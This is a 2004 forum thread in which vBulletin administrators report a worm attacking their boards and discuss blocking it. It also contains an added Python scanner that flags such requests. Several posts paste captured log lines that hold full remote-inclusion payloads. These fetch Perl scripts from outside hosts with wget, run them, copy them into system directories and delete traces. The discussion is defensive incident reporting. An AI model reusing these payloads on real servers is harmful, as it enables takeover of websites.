Security Warning - How they killed my vb

  • akonze
    Member
    • Mar 2004
    • 32

    Security Warning - How they killed my vb

    Yesterday someone started to attack my server. After some research with my webhoster it turned out to be that vBulletin produced the problems. Using vBulletin's logging system I could catch those two queries:

    Database error in vBulletin :

    Link-ID == false, connect failed

    mysql error:

    mysql error number: 0

    Date: Sunday 26th of December 2004 08:37:21 AM

    Script:
    http://www.mambers.com/showthread.php?t=11270/showthread.php?amp;t=11270&goto=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/usr/local/apache/proxy/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;rm%20-rf%20/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*%20/var/mail/sess_189f0f0889555397a4de5485dd611111*%20/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111*

    Referer:

    IP Address: 202.172.227.115

    and the second one

    I am not very skilled with this, but it looks dangerous. Currently my board is down and I am not sure what I could do. I do not run any significant modifications on the board, so I guess this is a security hole in vbulletin itself.
    Any help and advice would be appreciated.
  • enzo81
    New Member
    • Jul 2003
    • 25
    • 3.0.1

    #2
    looks similar to mine



    • Marc Smith
      Senior Member
      • Aug 2001
      • 510
      • 3.6.x

      #3
      You might want to edit your post and enclose the scripts in a 'code' block or something to keep it from making this page so wide.

      I've been experiencing an 'attack' for over 36 hours now. I looked at my Apache httpd log and 2 or 3 a minute are coming in from all sorts of servers from everywhere (or it is spoofing or whatever). I've seen as high as 400 requests an hour. I have done a few searches and in fact came here looking to see if this is happening to others with vBulletin.

      I'm on a dedicated server and haven't had any latency problems - and I don't typically use 10% of my bandwidth each month so it doesn't appear to be a big problem right now.

      I haven't experienced any database errors.

      I'm on FreeBSD - Don't know if that makes a difference.

      I'm assuming it's a variant of the recent phpBB Santy worm/bot (I think it's a perl script bot).

      I'm also interested in whether others are seeing this activity.

      So far I haven't seen any serious effect on my site or forum.
      Last edited by Marc Smith; Sun 26 Dec '04, 2:12am.


      • Stadler
        Senior Member
        • Oct 2001
        • 1021
        • 4.2.X

        #4
        Originally posted by akonze
        Yesterday someone started to attack my server. After some research with my webhoster it turned out to be that vBulletin produced the problems. Using vBulletin's logging system I could catch those two queries:

        [...]

        I am not very skilled with this, but it looks dangerous. Currently my board is down and I am not sure what I could do. I do not run any significant modifications on the board, so I guess this is a security hole in vbulletin itself.
        Any help and advice would be appreciated.
        Did they damage anything except causing overload on your server?

        [Edit:]I tried to search for a similar newspost in english but I can only provide a link to heise.de (german slashdot equivalent): http://www.heise.de/newsticker/meldung/54623

        However: The scripts on visualcoders.net have been removed.
        Last edited by Stadler; Sun 26 Dec '04, 2:24am.


        • Marc Smith
          Senior Member
          • Aug 2001
          • 510
          • 3.6.x

          #5
          This is an example from my Apache httpd log:
          Code:
          66.135.32.219 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/t-9142.html HTTP/1.0" 200 5353 "-" "lwp-trivial/1.41"
          66.135.32.219 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/t-9142.html/?pda=http://midomain.false.ca/~pillar/.zk/php.gif?&cmd=cd%20/tmp;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611113;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611112;perl%20sess_189f0f0889555397a4de5485dd611112;wget%20midomain.false.ca/~pillar/.zk/sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611114;rm%20-rf%20sess_189f0f0889555397a4de5485dd611113.*%20sess_189f0f0889555397a4de5485dd611114.*%20sess_189f0f0889555397a4de5485dd611112.*;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/tmp/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/spool/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/var/mail/;cp%20sess_189f0f0889555397a4de5485dd611111%20sess_189f0f0889555397a4de5485dd611113%20sess_189f0f0889555397a4de5485dd611114%20sess_189f0f0889555397a4de5485dd611112%20/usr/local/apache/proxy/;cd%20/var/tmp/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/spool/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/var/mail/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;cd%20/usr/local/apache/proxy/;perl%20sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611113;perl%20sess_189f0f0889555397a4de5485dd611114;perl%20sess_189f0f0889555397a4de5485dd611112;rm%20-rf%20/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/tmp/sess_189f0f0889555397a4de5485dd611111*%20/var/spool/mail/sess_189f0f0889555397a4de5485dd611111*%20/var/mail/sess_189f0f0889555397a4de5485dd611111*%20/usr/local/apache/proxy/sess_189f0f0889555397a4de5485dd611111* HTTP/1.1" 302 0 "-" "LWP::Simple/5.803"
           66.135.32.219 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/ HTTP/1.1" 200 8591 "-" "LWP::Simple/5.803"
          This is one more example:
          Code:
          62.101.0.30 - - [26/Dec/2004:02:28:30 -0500] "GET /Forums/showthread.php?t=8514 HTTP/1.0" 200 52354 "-" "lwp-trivial/1.38"
           62.101.0.30 - - [26/Dec/2004:02:28:32 -0500] "GET /Forums/showthread.php?t=8514/index.php?s=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 52674 "-" "LWP::Simple/5.76"
           62.101.0.30 - - [26/Dec/2004:02:28:34 -0500] "GET /Forums/showthread.php?t=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 19651 "-" "LWP::Simple/5.76"
           62.101.0.30 - - [26/Dec/2004:02:28:35 -0500] "GET /Forums/showthread.php?t=8514/forumdisplay.php?amp;f=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;
          Last edited by Marc Smith; Sun 26 Dec '04, 2:38am.

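As an added example (not code from this thread or from vBulletin), a small Python checker for the pattern visible in the log lines above: a query parameter whose value is itself a URL, followed by a cmd= parameter that chains a downloader and an interpreter. The sample lines are constructed to mirror those entries (documentation-range IPs and an .invalid host), and the LWP user agent is treated only as corroboration, never as a trigger on its own.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines modelled on the Apache entries quoted in this thread
# (documentation IPs and an .invalid host, not a real log).
SAMPLE_LOG = """\
192.0.2.10 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/t-9142.html HTTP/1.0" 200 5353 "-" "lwp-trivial/1.41"
192.0.2.10 - - [26/Dec/2004:01:01:17 -0500] "GET /Forums/archive/index.php/t-9142.html/?pda=http://example.invalid/x.gif?&cmd=cd%20/tmp;wget%20example.invalid/s.txt;perl%20s.txt HTTP/1.1" 302 0 "-" "LWP::Simple/5.803"
198.51.100.7 - - [26/Dec/2004:02:28:30 -0500] "GET /Forums/showthread.php?t=8514 HTTP/1.0" 200 52354 "-" "Mozilla/5.0"
"""

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# A query value that is itself a URL: the remote-file-inclusion half of the request.
REMOTE_URL_RE = re.compile(r'[?&][^=&]*=https?://', re.IGNORECASE)
# A cmd= value in which a shell separator is followed by a downloader or interpreter.
SHELL_CMD_RE = re.compile(
    r'[?&]cmd=[^&]*(?:;|\||&&)\s*(?:wget|curl|fetch|lynx|perl|sh)\b', re.IGNORECASE)

def analyse(line: str):
    """Return a finding for one suspicious access-log line, or None."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    decoded = unquote(m["url"])  # %20 and friends hide nothing once decoded
    reasons = []
    if REMOTE_URL_RE.search(decoded):
        reasons.append("remote-url-in-query")
    if SHELL_CMD_RE.search(decoded):
        reasons.append("shell-command-in-query")
    if not reasons:
        return None
    # LWP is the library these bots used, but legitimate Perl clients send it too.
    if m["ua"].lower().startswith(("lwp", "libwww")):
        reasons.append("lwp-user-agent")
    # The status code says nothing about success; a 200 or 302 both need host-side checks.
    return {"ip": m["ip"], "ts": m["ts"], "status": m["status"], "reasons": reasons}

def scan(log_text: str):
    """All findings for a whole log, in file order."""
    return [f for f in (analyse(l) for l in log_text.splitlines()) if f]

def by_source(findings):
    """Flagged requests per source IP; as the thread notes, a deny list built from this is short-lived."""
    return Counter(f["ip"] for f in findings)
```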

          • akonze
            Member
            • Mar 2004
            • 32

            #6
            Originally posted by Stadler
            However: The scripts on visualcoders.net have been removed.
            But this does not seem to remove the problem! When I route my domain to the forum again, this instantly generates a heavy load and traffic.

            And before anyone asks: the server runs php 4.3.10 already.


            • Marc Smith
              Senior Member
              • Aug 2001
              • 510
              • 3.6.x

              #7
              I don't think there's anything you can do to stop it, but if anyone has a way to stop it, I sure am interested. It's annoying even though it doesn't seem to be hurting anything.


              • akonze
                Member
                • Mar 2004
                • 32

                #8
                Well, I first tried to catch all IP addresses used by the attacking bot and block them using the .htaccess file (deny from ...). But this doesn't work very well. I easily caught hundreds of IPs and after blocking them, another hundred came up.

                I now did the following: I temporarily moved everything to a new domain name and uploaded a simple index.html redirection file on the old domain.

                I guess we can't do anything until the worm is gone again...


                • Marc Smith
                  Senior Member
                  • Aug 2001
                  • 510
                  • 3.6.x

                  #9
                  I checked IPs and they're from everywhere. Virginia, Texas, Poland, England - you name it. The Santy worm that affected phpBB was a Google issue - Used the Google search and Google shut that down. I'd like to know what this is coming from and how. It appears only a few of us here are experiencing the problem.

                  Also note in my two examples above there appear to be 2 different things attacking my site.


                  • Stadler
                    Senior Member
                    • Oct 2001
                    • 1021
                    • 4.2.X

                    #10
                    Perhaps filtering these requests using mod_security (www.modsecurity.org) would help a bit. At least it should be worth a try I guess.


                    • Marc Smith
                      Senior Member
                      • Aug 2001
                      • 510
                      • 3.6.x

                      #11
                      I'm definitely not an expert at this stuff. I'll have to take a good look at modsecurity and see if it's within my expertise.


                      • boro_boy
                        Senior Member
                        • Dec 2002
                        • 376
                        • 3.8.x

                        #12
                        This is also happening to me; it's used 13gig of bandwidth since yesterday. Has anyone found out how to stop it?


                        • Marc Smith
                          Senior Member
                          • Aug 2001
                          • 510
                          • 3.6.x

                          #13
                          I wish - Not that I've seen anywhere. Nor have I seen it mentioned on any virus / worm warning sites or such.


                          • Marc Smith
                            Senior Member
                            • Aug 2001
                            • 510
                            • 3.6.x

                            #14
                            See http://www.vbulletin.com/forum/showthread.php?t=124159 - There are 2 fixes there, it appears.


                            • boro_boy
                              Senior Member
                              • Dec 2002
                              • 376
                              • 3.8.x

                              #15
                              thank you
